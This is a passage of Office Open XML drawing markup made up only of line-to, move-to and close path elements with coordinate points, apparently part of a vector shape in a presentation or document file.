                  <a:lnTo>
                    <a:pt x="3779" y="4956"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3722" y="4946"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3669" y="4930"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3548" y="4893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3433" y="4846"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3317" y="4783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3317" y="4783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3328" y="4693"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3338" y="4604"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3344" y="4509"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3344" y="4421"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3338" y="4332"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3328" y="4237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3312" y="4148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3297" y="4058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3297" y="4058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3375" y="4064"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3449" y="4068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3528" y="4074"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3596" y="4090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3596" y="4090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3601" y="4105"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3606" y="4121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3611" y="4137"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3628" y="4153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3638" y="4163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3654" y="4168"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3669" y="4174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3690" y="4179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3690" y="4179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3764" y="4326"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3827" y="4479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3874" y="4630"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3911" y="4783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3911" y="4783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3885" y="4788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3858" y="4799"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3837" y="4814"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3816" y="4835"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3801" y="4856"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3790" y="4877"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3779" y="4909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3779" y="4935"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3779" y="4956"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2698" y="4174"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2698" y="4174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2813" y="4132"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2929" y="4100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2929" y="4100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2940" y="4116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2955" y="4127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2976" y="4137"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2992" y="4137"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2992" y="4137"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3023" y="4132"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3044" y="4121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3060" y="4100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3070" y="4074"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3070" y="4074"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3155" y="4064"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3239" y="4058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3239" y="4058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3260" y="4142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3270" y="4226"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3281" y="4315"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3291" y="4405"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3291" y="4489"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3291" y="4578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3286" y="4667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3275" y="4756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3275" y="4756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3191" y="4709"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3113" y="4652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3034" y="4589"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2960" y="4526"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2887" y="4457"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2819" y="4384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2750" y="4310"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2687" y="4232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2687" y="4232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2698" y="4211"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2698" y="4189"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2698" y="4174"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="3223" y="3979"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3223" y="3979"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3128" y="3985"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3040" y="4001"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3040" y="4001"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3018" y="3990"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2992" y="3985"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2992" y="3985"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2971" y="3990"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2955" y="3995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2940" y="4011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2929" y="4027"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2929" y="4027"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2861" y="4042"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2793" y="4068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2724" y="4095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2661" y="4121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2661" y="4121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2640" y="4116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2625" y="4111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2625" y="4111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2609" y="4116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2593" y="4095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2593" y="4095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2614" y="4079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2625" y="4058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2629" y="4038"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2635" y="4011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2635" y="4011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2776" y="3964"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2908" y="3911"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3040" y="3854"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3160" y="3785"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3160" y="3785"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3191" y="3880"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3223" y="3979"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="4220" y="4856"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4220" y="4856"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4184" y="4972"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4131" y="5087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4068" y="5197"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4000" y="5303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4000" y="5303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3958" y="5355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3958" y="5344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3958" y="5344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3958" y="5334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3958" y="5334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4000" y="5303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3953" y="5318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3953" y="5318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3942" y="5303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3926" y="5292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3926" y="5292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3948" y="5192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3963" y="5087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3963" y="5087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3989" y="5077"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4011" y="5066"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4032" y="5056"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4047" y="5040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4063" y="5019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4073" y="4998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4079" y="4972"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4084" y="4951"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4084" y="4951"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4158" y="4909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4189" y="4883"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4220" y="4856"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4220" y="4856"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4189" y="4877"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4158" y="4898"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4121" y="4919"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4084" y="4930"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4084" y="4930"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4084" y="4903"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4073" y="4877"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4063" y="4856"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4047" y="4835"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4032" y="4814"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4011" y="4804"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3984" y="4788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3958" y="4783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3958" y="4783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3948" y="4704"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3932" y="4620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3911" y="4541"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3890" y="4457"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3864" y="4379"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3832" y="4300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3795" y="4221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3758" y="4142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3769" y="4127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3769" y="4127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3869" y="4163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3969" y="4205"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4052" y="4252"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4131" y="4305"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4131" y="4305"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4047" y="4237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3958" y="4174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3869" y="4121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3779" y="4074"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3779" y="4074"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3769" y="4048"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3748" y="4021"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3722" y="4006"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3706" y="4001"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3690" y="3995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3680" y="3995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3680" y="3995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3611" y="3885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3533" y="3774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3533" y="3774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3533" y="3754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3533" y="3754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3528" y="3727"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3517" y="3707"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3496" y="3696"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3470" y="3691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3459" y="3691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3428" y="3649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3428" y="3649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3433" y="3627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3433" y="3627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3428" y="3607"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3423" y="3591"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3423" y="3591"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3464" y="3549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3496" y="3507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3522" y="3460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3543" y="3418"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3559" y="3370"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3564" y="3323"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3564" y="3281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3554" y="3234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3554" y="3234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3559" y="3276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3559" y="3318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3548" y="3360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3533" y="3402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3507" y="3439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3481" y="3480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3444" y="3523"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3401" y="3565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3401" y="3565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3381" y="3554"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3354" y="3549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3354" y="3549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3334" y="3549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3334" y="3549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3270" y="3497"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3213" y="3444"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3150" y="3391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3081" y="3344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3018" y="3302"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2950" y="3260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2876" y="3223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2808" y="3192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2808" y="3192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2761" y="3150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2719" y="3119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2672" y="3097"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2629" y="3082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2629" y="3082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2703" y="3129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2772" y="3176"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2772" y="3176"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2656" y="3134"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2535" y="3103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2535" y="3103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2609" y="3124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2687" y="3155"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2761" y="3192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2840" y="3234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2882" y="3271"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2856" y="3244"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2856" y="3244"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2966" y="3318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3076" y="3402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3181" y="3497"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3281" y="3601"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3281" y="3601"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3275" y="3627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3275" y="3627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3281" y="3654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3281" y="3654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3187" y="3717"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3187" y="3717"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3123" y="3597"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3050" y="3480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3013" y="3423"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2971" y="3370"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2929" y="3323"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2882" y="3271"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2882" y="3271"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2950" y="3370"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3018" y="3480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3087" y="3607"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3144" y="3738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3144" y="3738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3023" y="3801"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2897" y="3859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2761" y="3911"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2625" y="3958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2625" y="3958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2603" y="3932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2582" y="3911"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2551" y="3901"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2519" y="3895"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2519" y="3895"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2488" y="3901"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2488" y="3901"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2451" y="3801"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2420" y="3707"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2399" y="3607"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2388" y="3512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2388" y="3413"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2393" y="3318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2415" y="3223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2446" y="3129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2446" y="3129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2425" y="3176"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2409" y="3223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2393" y="3271"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2378" y="3318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2362" y="3418"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2357" y="3517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2367" y="3617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2383" y="3717"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2409" y="3822"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2446" y="3921"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2446" y="3921"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2430" y="3938"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2415" y="3958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2409" y="3985"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2404" y="4011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2404" y="4021"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2404" y="4021"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2283" y="4053"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2162" y="4074"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2052" y="4090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1942" y="4095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1848" y="4095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1764" y="4090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1690" y="4074"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1658" y="4058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1632" y="4048"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1632" y="4048"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1658" y="4064"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1695" y="4079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1727" y="4095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1769" y="4105"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1858" y="4121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1952" y="4127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2063" y="4121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2178" y="4111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2299" y="4095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2420" y="4068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2420" y="4068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2435" y="4095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2462" y="4111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2488" y="4121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2519" y="4127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2519" y="4127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2546" y="4121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2556" y="4148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2556" y="4148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2551" y="4163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2546" y="4185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2546" y="4185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2451" y="4247"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2362" y="4315"/>
                  </a:lnTo>
                  <a:lnTo>
